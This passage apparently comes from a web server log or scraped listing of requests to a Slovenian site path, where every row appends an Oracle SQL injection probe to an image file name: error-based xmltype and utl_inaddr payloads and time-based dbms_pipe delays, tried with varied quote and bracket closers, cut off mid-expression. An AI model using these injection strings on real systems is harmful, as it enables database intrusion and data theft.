2471. | | balance.gif)) and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif)) and 8884=(select upper(xmltype(chr(60) |
2472. | | balance.gif and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif and 8884=(select upper(xmltype(chr(60) |
2473. | | balance.gif') and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif') and 8884=(select upper(xmltype(chr(60) |
2474. | | balance.gif')) and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif')) and 8884=(select upper(xmltype(chr(60) |
2475. | | balance.gif' and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif' and 8884=(select upper(xmltype(chr(60) |
2476. | | balance.gif') and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif') and 8884=(select upper(xmltype(chr(60) |
2477. | | balance.gif%' and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif%' and 8884=(select upper(xmltype(chr(60) |
2478. | | balance.gif' and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif' and 8884=(select upper(xmltype(chr(60) |
2479. | | balance.gif") and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif") and 8884=(select upper(xmltype(chr(60) |
2480. | | balance.gif" and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif" and 8884=(select upper(xmltype(chr(60) |
2481. | | balance.gif and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif and 8884=(select upper(xmltype(chr(60) |
2482. | | balance.gif) and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif) and 3003=utl_inaddr.get_host_address(chr(113) |
2483. | | balance.gif)) and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif)) and 3003=utl_inaddr.get_host_address(chr(113) |
2484. | | balance.gif and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif and 3003=utl_inaddr.get_host_address(chr(113) |
2485. | | balance.gif') and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif') and 3003=utl_inaddr.get_host_address(chr(113) |
2486. | | balance.gif')) and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif')) and 3003=utl_inaddr.get_host_address(chr(113) |
2487. | | balance.gif' and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif' and 3003=utl_inaddr.get_host_address(chr(113) |
2488. | | balance.gif') and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif') and 3003=utl_inaddr.get_host_address(chr(113) |
2489. | | balance.gif%' and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif%' and 3003=utl_inaddr.get_host_address(chr(113) |
2490. | | balance.gif' and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif' and 3003=utl_inaddr.get_host_address(chr(113) |
2491. | | balance.gif") and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif") and 3003=utl_inaddr.get_host_address(chr(113) |
2492. | | balance.gif" and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif" and 3003=utl_inaddr.get_host_address(chr(113) |
2493. | | balance.gif and 3003=utl_inaddr.get_host_address(chr(113) //slike//stran_1 AND 5486/balance.gif and 3003=utl_inaddr.get_host_address(chr(113) |
2494. | | (cast((chr(113) //slike//stran_1 AND 5486/(cast((chr(113) |
2495. | | (select (chr(113) //slike//stran_1 AND 5486/(select (chr(113) |
2496. | | (select chr(113) //slike//stran_1 AND 5486/(select chr(113) |
2497. | | balance.gif);select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif);select dbms_pipe.receive_message(chr(116) |
2498. | | balance.gif));select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif));select dbms_pipe.receive_message(chr(116) |
2499. | | balance.gif;select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif;select dbms_pipe.receive_message(chr(116) |
2500. | | balance.gif');select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif');select dbms_pipe.receive_message(chr(116) |
2501. | | balance.gif'));select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif'));select dbms_pipe.receive_message(chr(116) |
2502. | | balance.gif';select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif';select dbms_pipe.receive_message(chr(116) |
2503. | | balance.gif%';select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif%';select dbms_pipe.receive_message(chr(116) |
2504. | | balance.gif");select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif");select dbms_pipe.receive_message(chr(116) |
2505. | | balance.gif";select dbms_pipe.receive_message(chr(116) //slike//stran_1 AND 5486/balance.gif";select dbms_pipe.receive_message(chr(116) |